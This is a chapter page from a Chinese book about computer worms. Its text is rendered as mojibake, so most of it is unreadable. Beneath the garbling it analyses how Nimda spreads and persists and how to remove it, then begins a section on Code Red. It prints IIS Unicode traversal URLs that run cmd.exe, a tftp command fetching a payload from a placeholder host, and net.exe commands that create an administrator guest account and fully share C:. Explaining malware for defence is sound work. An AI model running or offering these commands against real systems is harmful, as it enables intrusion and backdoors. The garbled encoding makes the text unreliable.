ÓÑÇéÌáʾ£ºÈç¹û±¾ÍøÒ³´ò¿ªÌ«Âý»òÏÔʾ²»ÍêÕû£¬Çë³¢ÊÔÊó±êÓÒ¼ü¡°Ë¢Ð¡±±¾ÍøÒ³£¡ÔĶÁ¹ý³Ì·¢ÏÖÈκδíÎóÇë¸æËßÎÒÃÇ£¬Ð»Ð»£¡£¡ ±¨¸æ´íÎó
°Ë°ËÊé³Ç ·µ»Ø±¾ÊéĿ¼ ÎÒµÄÊé¼Ü ÎÒµÄÊéÇ© TXTÈ«±¾ÏÂÔØ ½øÈëÊé°É ¼ÓÈëÊéÇ©

ÖªÕßÎÞη--Ò»¸öÕæʵµÄ²¾ÊÀ½ç-µÚÕÂ

°´¼üÅÌÉÏ·½Ïò¼ü ¡û »ò ¡ú ¿É¿ìËÙÉÏÏ·­Ò³£¬°´¼üÅÌÉ쵀 Enter ¼ü¿É»Øµ½±¾ÊéĿ¼ҳ£¬°´¼üÅÌÉÏ·½Ïò¼ü ¡ü ¿É»Øµ½±¾Ò³¶¥²¿£¡
¡ª¡ª¡ª¡ªÎ´ÔĶÁÍꣿ¼ÓÈëÊéÇ©ÒѱãÏ´μÌÐøÔĶÁ£¡



ÁÙʱÎļþ¼ÐÖжÁÈ¡ËùÓС¨htm¡¨£¬¡¨html¡¨Îļþ²¢´ÓÖÐÌáÈ¡µç×ÓÓʼþµØÖ·£¬¡¡´ÓÐÅÏä¶ÁÈ¡µç×ÓÓʼþµØÖ·²¢´ÓÖÐÌáÈ¡SMTP·þÎñÆ÷£¬È»ºó·¢ËÍreadme¡£eml£¬Õâ¿É±È½ö½öͨ¹ýoutlook´«²¥ÒªÀ÷º¦ºÍÒþ±ÎµÃ¶à¡£¡¡
£¨¶þ£©Í¨¹ý΢ÈíµÄunicode©¶´
ÔÚIIS¡¡4¡£0ºÍIIS¡¡5¡£0ÔÚUnicode×Ö·û½âÂëµÄʵÏÖÖдæÔÚÒ»¸ö°²È«Â©¶´£¬µ¼ÖÂÓû§¿ÉÒÔÔ¶³Ìͨ¹ýIISÖ´ÐÐÈÎÒâÃüÁî¡£µ±IIS´ò¿ªÎļþʱ£¬Èç¹û¸ÃÎļþÃû°üº¬unicode×Ö·û£¬Ëü»á¶ÔÆä½øÐнâÂ룬Èç¹ûÓû§ÌṩһЩÌØÊâµÄ±àÂ룬½«µ¼ÖÂIIS´íÎóµÄ´ò¿ª»òÕßÖ´ÐÐijЩweb¸ùĿ¼ÒÔÍâµÄÎļþ¡£
¡¡¡¡¶ÔÓÚIIS¡¡5¡£0/4¡£0ÖÐÎİ棬µ±IISÊÕµ½µÄURLÇëÇóµÄÎļþÃûÖаüº¬Ò»¸öÌØÊâµÄ±àÂëÀýÈ硨£¥c1£¥hh¡¨»òÕß¡¨£¥c0£¥hh¡¨£»Ëü»áÊ×ÏȽ«Æä½âÂë±ä³É£º0xc10xhh£¬¡¡È»ºó³¢ÊÔ´ò¿ªÕâ¸öÎļþ£¬Windows¡¡ÏµÍ³ÈÏΪ0xc10xhh¿ÉÄÜÊÇunicode±àÂ룬Òò´ËËü»áÊ×ÏȽ«Æä½âÂ룬Èç¹û¡¡0x00¡¡£¨0xc1¡¡¡­¡¡0xc0£©¡¡*¡¡0x40¡¡£«¡¡0xhh
£¥c0£¥hh¡¡¡­¡·¡¡£¨0xc0¡¡¡­¡¡0xc0£©¡¡*¡¡0x40¡¡£«¡¡0xhh
¡¡¡¡Òò´Ë£¬ÀûÓÃÕâÖÖ±àÂ룬ÎÒÃÇ¿ÉÒÔ¹¹ÔìºÜ¶à×Ö·û£¬ÀýÈ磺
£¥c1£¥1c¡¡¡­¡·¡¡£¨0xc1¡¡¡­¡¡0xc0£©¡¡*¡¡0x40¡¡£«¡¡0x1c¡¡=¡¡0x5c¡¡=¡¡'/'
£¥c0£¥2f¡¡¡­¡·¡¡£¨0xc0¡¡¡­¡¡0xc0£©¡¡*¡¡0x40¡¡£«¡¡0x2f¡¡=¡¡0x2f¡¡=¡¡''
¹¥»÷Õß¿ÉÒÔÀûÓÃÕâ¸ö©¶´À´ÈƹýIISµÄ·¾¶¼ì²é£¬È¥Ö´ÐлòÕß´ò¿ªÈÎÒâµÄÎļþ¡£¡¡
Èç¹ûϵͳ°üº¬Ä³¸ö¿ÉÖ´ÐÐĿ¼£¬¾Í¿ÉÄÜÖ´ÐÐÈÎÒâϵͳÃüÁî¡£ÏÂÃæµÄURL¿ÉÄÜ
Áгöµ±Ç°Ä¿Â¼µÄÄÚÈÝ£º
victim/scripts/¡£¡££¥c1£¥1c¡£¡£/winnt/system32/cmd¡£exe£¿/c£«dir
ÀûÓÃÕâ¸ö©¶´²é¿´ÏµÍ³ÎļþÄÚÈÝÒ²ÊÇ¿ÉÄܵģº
victim/a¡£asp/¡£¡££¥c1£¥1c¡£¡£/¡£¡££¥c1£¥1c¡£¡£/winnt/win¡£ini
£¨Èý£©Í¨¹ýºìÉ«´úÂë¶þ´ú½¨Á¢µÄroot¡£exe¡¡
ºìÉ«´úÂë¶þ´ú»áÔÚIISµÄ¼¸¸ö¿ÉÖ´ÐÐĿ¼Ï·ÅÖÃroot¡£exe¡¡
Ò²ÊǾ¡È˽ÔÖª£¬NimdaÊ×ÏÈÔÚudp/69ÉÏÆô¶¯Ò»¸ötftp·þÎñÆ÷¡¡
È»ºó»á×÷ÒÔÏÂɨÃè¡¡

Ò»µ©·¢ÏÖÓÐÈõµãµÄϵͳ¾ÍʹÓÃÀàËÆÏÂÃæµÄÃüÁî¡¡
GET¡¡/scripts/root¡£exe£¿/c£«tftp¡¡¡­i¡¡xxx¡£xxx¡£xxx¡£xxx¡¡GET¡¡Admin¡£dll¡¡HTTP/1¡£0¡¡
°ÑÎļþ´«µ½Ö÷»úÉÏÈ¥£¬È»ºóÔÙGET¡¡/scripts/Admin¡£dll¡¡HTTP/1¡£0¡¡
£¨ËÄ£©Í¨¹ýWWW·þÎñ¡¡ÔÚËùÓÐÎļþÃûÖаüº¬default/index/main/readme²¢ÇÒÀ©Õ¹ÃûΪhtm/html/aspµÄÎļþ¡¡ËùÔÚĿ¼Öд´½¨readme¡£eml£¬²¢ÔÚÎļþÄ©¼ÓÉÏÏÂÃæÕâÒ»ÐС¡window¡£open£¨¡¨readme¡£eml¡¨£»¡¡null£»¡¡¡¨resizable=no£»top=6000£»left=6000¡¨£©¡¡
Ò²¾ÍÊÇ˵Èç¹ûһ̨web·þÎñÆ÷±»¸ÐȾÁË£¬ÄÇô´ó²¿·Ö·ÃÎʹý´Ë·þÎñÆ÷µÄ»úÆ÷¶¼»á±»¸ÐȾ¡£¡¡
£¨Î壩ͨ¹ý¾ÖÓòÍø¡¡
Nimda»áËÑË÷±¾µØµÄ¹²ÏíĿ¼Öаüº¬docÎļþµÄĿ¼£¬Ò»µ«ÕÒµ½£¬¾Í»á°Ñ×ÔÉí¸´ÖƵ½Ä¿Â¼ÖÐÃüÃûΪriched20¡£dll£¨Ô­Àí¼ûÇ°£©¡¡
£¨Áù£©ÒÔ²¡¶¾µÄ·½Ê½¡¡
ËÑË÷£§SOFTWAREMicrosoftWindowsCurrentVersionApp¡¡Paths£§Ñ°ÕÒÔÚÔ¶³ÌÖ÷»úÉϵĿÉÖ´ÐÐÎļþ£¬¡¡Ò»µ©ÕÒµ½£¬Nimda¾Í»áÒÔ²¡¶¾µÄ·½Ê½¸ÐȾÎļþ¡£ÓÐÒ»µã²»Í¬µÄÊÇ£¬Ëü°ÑÔ­Îļþ×÷Ϊ×ÊÔ´´æ´¢ÔÚÐÂÎļþÖУ¬¡¡ÔËÐÐÐÂÎļþʱÔÙµ±×÷¿ÉÖ´ÐÐÎļþÀ´µ÷Óá£Ææ¹ÖµÄÊÇNimda¹ýÂËÁËwinzip32¡£exe£¬Ëü²»»á¸ÐȾwinzip32¡£exe£¬¡¡Ó¦¸ÃÊÇ×÷Õß·¢ÏÖwinzipȾ¶¾ºó²»ÄÜÕý³£ÔËÐУ¬¾Í¹ýÂ˵ôÕâ¸öʹÓÃ×îΪ¹ã·ºµÄѹËõ³ÌÐò¡£¡¡

ÈçºÎÔËÐеģº¡¡
²¡¶¾²ÉÈ¡ÒÔÏ´ëÊ©È·±£×Ô¼ºÔÚϵͳһ¿ª»úÖ®ºó¾ÍÔËÐУº
1£©°Ñ×Ô¼º¸´ÖƵ½windowsϵͳÎļþ¼ÐÀïÃüÃûΪriched20¡£dll£¨Ô­Àí¼ûÇ°£©¡¡
2£©°Ñ×Ô¼º¸´ÖƵ½windowsϵͳÎļþ¼ÐÀïÃüÃûΪload¡£exe£¬¡¡
ÐÞ¸Äsystem¡£ini°Ñ¡¡
shell=explorer¡£exe¸ÄΪ¡¡
shell=explorer¡£exe¡¡load¡£exe¡¡¡­dontrunold¡¡
ʹ²¡¶¾ÔÚÏ´ÎϵͳÆô¶¯Ê±ÔËÐС£¡¡

°²È«ÔÖÄÑ¡ª´´½¨ºóÃÅ£º¡¡
1£©¡¡Èç¹ûÓÐ×㹻ȨÏÞ½«µ÷Óá¨net¡£exe¡¨Ö´ÐÐÒÔÏÂϵͳÃüÁ¡¡
net¡¡user¡¡guest¡¡/add¡¡ Ôö¼ÓÒ»¸öguestÓû§
net¡¡user¡¡guest¡¡/active ¼¤»îguestÓû§
net¡¡user¡¡guest¡¡¡¨¡¨¡¡ guestÓû§µÄÃÜÂëΪ¿Õ
net¡¡localgroup¡¡Administrators¡¡guest¡¡½«guest¼Óµ½¹ÜÀíÔ±×éÖУ¡Ì«¿ÉÅÂÁË¡£
net¡¡localgroup¡¡Guests¡¡guest¡¡/add¡¡
½á¹ûÊÇ¿ÕÃÜÂëµÄguest¼Óµ½ÁËAdministrators×éÖС£¡¡

2£©Èç¹ûÓÐ×㹻ȨÏÞ½«µ÷Óá¨net¡£exe¡¨Ö´ÐÐÒÔÏÂϵͳÃüÁ¡¡
net¡¡share¡¡c=c£º¡¡
ɾ³ý£§SYSTEMCurrentControlSetServiceslanmanserverSharesSecurity£§µÄËùÓÐ×Ó¼ü¡¡
½á¹ûÊÇC£ºÉèΪÍêÈ«¹²Ïí¡£¡¡

×÷ÕßÊÇË­£¿¡¡
³ÌÐòµÄ×÷ÕßÔÚ³ÌÐòÖÐÁôÏÂÁËÒÔϱê¼Ç£º¡¡
fsdhqherwqi2001¡¡
Concept¡¡Virus£¨CV£©¡¡V¡£5£»¡¡Copyright£¨C£©2001¡¡R¡£P¡£China¡¡
¿ÉÄܶÔ×îÖÕÕÒ³ö×÷ÕßÓаïÖú¡£¡¡
´ÓÕâЩÐÅÏ¢À´¿´£¬Ëƺõ×÷ÕßÀ´×ÔÖйú£¬µ«ÊÇÔÚ×÷ÕßûÓÐÕ¾³öÀ´³ÐÈÏ֮ǰ£¬ÕâЩÎÄ×Ö¿ÉÒÔʹÈκÎÈ˼ÓÔÚ²¡¶¾´úÂëÀïµÄ¡£

Ϊʲô˵ÄáÄ·´ïÊÇ¡¨¸ÅÄÈä³æ£¿¡¡
Ëü¿ÉÒÔͨ¹ýÖÁÉÙÁùÖÖ·½Ê½´«²¥¡¡
ËüÊÇÒ»¸ö´øexeÀ©Õ¹ÃûµÄdll£¬¿ÉÒÔ×öΪ¿ÉÖ´ÐÐÎļþÔËÐУ¬Ò²¿É×÷ΪdllÔËÐС£¡¡
ËüÓÐÖǻۣºµ±ËüÃûΪAdmin¡£dll±»ÔËÐÐʱ£¬Ëü»á°Ñ×Ô¼º¸´ÖƵ½windowsÎļþ¼ÐÃüÃûΪmmc¡£exe²¢´øÉϲÎÊý¡¨¡­qusery9bnow¡¨ÔËÐС£¡¡
µ±ËüÃûΪreadme¡£exe±»ÔËÐÐʱ£¬Ëü»á°Ñ×Ô¼º¸´ÖƵ½£¥temp£¥´øÉϲÎÊý¡¨¡­dontrunold¡¨ÔËÐС£¡¡
Ëü»á°Ñ×Ô¼ºµÄÊôÐÔÉèΪ¡¨ÏµÍ³¡¨¡¨Òþ²Ø¡¨£¬ÔÙ¸Äдע²á±í£¬Ê¹¡¨ÏµÍ³¡¨¡¨Òþ²Ø¡¨ÊôÐԵijÌÐòÔÚ×ÊÔ´¹ÜÀíÆ÷Öв»¿É¼û¡£¡¡
ËüÊÇÒ»¸öÖ÷»úɨÃèÆ÷£¬Ò»¸öÈõµãɨÃèÆ÷£¬Ò»¸öºóÃųÌÐò£»´øÓжà¸ö©¶´£¬ÕÆÎÕ×îÐµİ²È«ÐÅÏ¢£»Ëü¾ÍÊÇÒ»¸öºÚ¿Í£¬ÈËÃÇ°ÑËü³ÆΪ¡°ÈðÊ¿¾üµ¶¡±²»ÊÇûÓеÀÀíµÄ¡£¡¡

ÈçºÎÇå³ýÄáÄ·´ï²¡¶¾£¿¡¡
ÔÚÎļþ¼ÐÑ¡ÏîÀïÉèÖá¨ÏÔʾËùÓÐÎļþ¡¨¡¡
ɾ³ýmmc¡£exe/load¡£exe/riched20¡£dll/admin¡£dll/readme¡£eml/readme¡£exeµÈËùÓÐÈä³æÎļþ¡£¡¡
´Óԭʼ°²×°ÅÌÖÐÌáÈ¡riched20¡£dll¸²¸ÇwindowsϵͳÎļþ¼ÐÀïµÄͬÃûÈä³æÎļþ¡£¡¡
¼ì²éËùÓдóСΪ57344»ò79225µÄÎļþ¡£¡¡
¿ÉÒÔʹÓᨲéÕÒ¡¨¹¤¾ß£¬ËÑË÷°üº¬¡¨fsdhqherwqi2001¡¨µÄ*¡£exe/*¡£dllºÍ°üº¬¡¨Kz29vb29oWsrLPh4eisrPb09Pb2¡¨µÄ*¡£eml/*¡£nws¡£¡¡
¼ì²ésystem¡£ini£¬È¥µô×Ô¶¯Ö´ÐÐload¡£exeÎļþµÄÐС£¡¡
¼ì²éËùÓÐÎļþÃûÖаüº¬default/index/main/readme²¢ÇÒÀ©Õ¹ÃûΪhtm/html/aspµÄÎļþ¡£¡¡
ɾ³ýC£ºµÄ¹²Ïí¡¡
ÖØÆðϵͳ¡¡

ÈçºÎ±ÜÃâNimdaÈëÇÖ£¿


¸ù±¾Ö®µÀÊÇ´ò²¹¶¡£º¡¡
Unicode©¶´£ºmicrosoft/technet/security/bulletin/ms00¡­078¡£asp¡¡
MIME©¶´£ºmicrosoft/technet/security/bulletin/ms01¡­020¡£asp¡¡
IE5¡£01¡¡SP2£ºmicrosoft/windows/ie/downloads/remended/ie501sp2/default¡£asp¡¡
IE5¡£5¡¡SP2£ºmicrosoft/windows/ie/downloads/remended/ie501sp2/default¡£asp¡¡

ÆäËû½â¾ö·½°¸£º¡¡
´ò¿ªIEµÄ¡¨¹¤¾ß¡·internetÑ¡Ïî¡·°²È«¡·×Ô¶¨Ò弶±ð¡·ÎļþÏÂÔØ¡¨Ñ¡¡¨½ûÓᨡ£¡¡
ɾ³ýËùÓв»ÐèÒªµÄĬÈÏÐéÄâĿ¼£¬»òÕßÖ»¸ø´¿½Å±¾Ö´ÐÐȨ£¬×îºÃ²»Òª°ÑÈκÎwebĿ¼·ÅÔÚϵͳ·ÖÇø¡£¡¡
¼ì²é¹²ÏíÉèÖã¬Win9XµÄ»úÆ÷²»Òª¿ªÍêÈ«¹²Ïí£¬¿ÉÒÔ¿ªÖ»¶Á¹²Ïí£¬ËùÓй²Ïí¶¼ÒªÉèÖÿÚÁî¡£¡¡ÓÉÓÚÄáÄ·´ï¿ÉÒÔÀûÓúìÉ«´úÂë¶þ´ú´´½¨µÄºóÃÅ£¬ËùÒÔÐè´òÉÏÕë¶ÔºìÉ«´úÂë¶þ´úµÄ²¹¶¡£¬
¼ì²éC£ººÍD£º¡¡ÓÐûÓÐexplorer¡£exe£¬¼ì²éwebĿ¼ÖÐÓÐûÓÐroot¡£exe¡£¡¡
µÚ¶þ½Ú¡¡ºìÉ«´úÂëÊǺìÉ«µÄÂð£¿
ÄãÖªµÀÂð£¬ÔÚ¡°ºìÉ«´úÂ롱Á÷ÐÐ֮ǰ£¬ÒѾ­³öÏÖ¹ý¡°ÂÌÉ«´úÂ롱£¬¶øÔÚ¡°ºìÉ«´úÂ롱֮ºó£¬ÓÖ³öÏÖÁË¡°À¶É«´úÂ롱£¬ÕâЩÎåÑÕÁùÉ«µÄ¶«Î÷µÄ³öÏÖ£¬·Â·ðÐû¸æµçÄÔ²¡¶¾ÒѾ­³ÉΪһÖÖʱÉУ¬¾ÍÏñ´©Ò·þÓÐÁ÷ÐÐÉ«Ò»Ñù£¬Ëƺõ²¡¶¾Ò²ÓÐÁË×Ô¼ºµÄÁ÷ÐÐÉ«¡£
ʵ¼ÊÉÏ£¬´ÓijÖÖÒâÒåÉÏ£¬É±¶¾Èí¼þ³§É̶ÔÒ»ÖÖ²¡¶¾½øÐзÖÎöÖ®ºó£¬½«ÆäÃüÃûΪ¡°ÂÌÉ«´úÂ롱Ӧ¸ÃÊÇÒýµ¼ÕⳡʱÉеÄÏȷ棬ÒòΪÕâÖÖÃüÃû£¬²¡¶¾×÷Õß¹ÊÒâÔÚеIJ¡¶¾ÀïÃæ°üÀ¨ÁËÀàËÆ¡°Code¡¡Red¡±Ö®ÀàµÄ×Ö·û£¬Èò¡¶¾µÄ·¢ÏÖÕßÃüÃûËüΪ¡°ºìÉ«´úÂ롱£¬²¡¶¾ºÍ·´²¡¶¾¹²Í¬Òýµ¼ÁËÕⳡÑÕÉ«µÄ¸ïÃü¡£
ºìÉ«´úÂëÓÐÒ»´úºÍ¶þ´úÁ½ÖÖ£¬ÎÒÃÇÖصã·ÖÎö¶þ´ú£º
ºìÉ«´úÂë¶þ´úÓÚ2001Äê8ÔÂÊ״η¢ÏÖ£¬ËüÊÇ¡°ºìÉ«´úÂ롱²¡¶¾µÄÒ»¸ö±äÖÖ¡£¡¡
ºÍ¡°ºìÉ«´úÂ롱һÑù£¬ËüÒ²ÊÇÀûÓûº³åÇøÒç³ö´«²¥µ½ÆäËûweb·þÎñÆ÷¡£ÓÉÓÚÊÕµ½ÁË´óÁ¿µÄÒòÌØÍøÐÅÏ¢·þÎñÆ÷£¨IIS¡¡Server£©±»¸ÐȾµÄ±¨¸æ¡£ÎÒÃÇ°Ñ¡°ºìÉ«´úÂë¶þ´ú¡±¶¨Îª¸ß¶ÈΣÏÕ¡£
×îÔçµÄ¡°ºìÉ«´úÂ롱Ôø¾­³É¹¦µÄ¹¥»÷ÁË°×¹¬µÄÖ÷Ò³£¬µ¼ÖÂÆä¾Ü¾ø·þÎñ¡£¸ü½øÒ»²½£¬¡°ºìÉ«´úÂë¶þ´ú¡±¿ÉÒÔʹºÚ¿ÍÔÚÔ¶³ÌÈ¡µÃ¶Ô·þÎ
·µ»ØĿ¼ ÉÏÒ»Ò³ ÏÂÒ»Ò³ »Øµ½¶¥²¿ ÔÞ£¨0£© ²È£¨0£©
δÔĶÁÍꣿ¼ÓÈëÊéÇ©ÒѱãÏ´μÌÐøÔĶÁ£¡
ÎÂÜ°Ìáʾ£º ο´Ð¡ËµµÄͬʱ·¢±íÆÀÂÛ£¬Ëµ³ö×Ô¼ºµÄ¿´·¨ºÍÆäËüС»ï°éÃÇ·ÖÏíÒ²²»´íŶ£¡·¢±íÊéÆÀ»¹¿ÉÒÔ»ñµÃ»ý·ÖºÍ¾­Ñé½±Àø£¬ÈÏÕæдԭ´´ÊéÆÀ ±»²ÉÄÉΪ¾«ÆÀ¿ÉÒÔ»ñµÃ´óÁ¿½ð±Ò¡¢»ý·ÖºÍ¾­Ñé½±ÀøŶ£¡